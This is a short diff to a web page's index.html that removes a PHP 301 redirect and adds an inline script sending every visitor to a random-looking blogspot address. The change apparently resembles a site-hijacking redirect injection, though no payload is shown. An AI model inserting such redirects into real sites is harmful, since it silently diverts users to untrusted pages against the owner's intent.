--- a/pages/index.html
+++ b/pages/index.html
@@ -1,4 +1,2 @@
-<?php
-  header('Location: http://www.new-website.com/', true, 301);
-  exit();
-?>
+<script language='javascript' type='text/javascript'>
+window.location ="http://dofaalmntwfaa.blogspot.be/search/label/u5";</script>
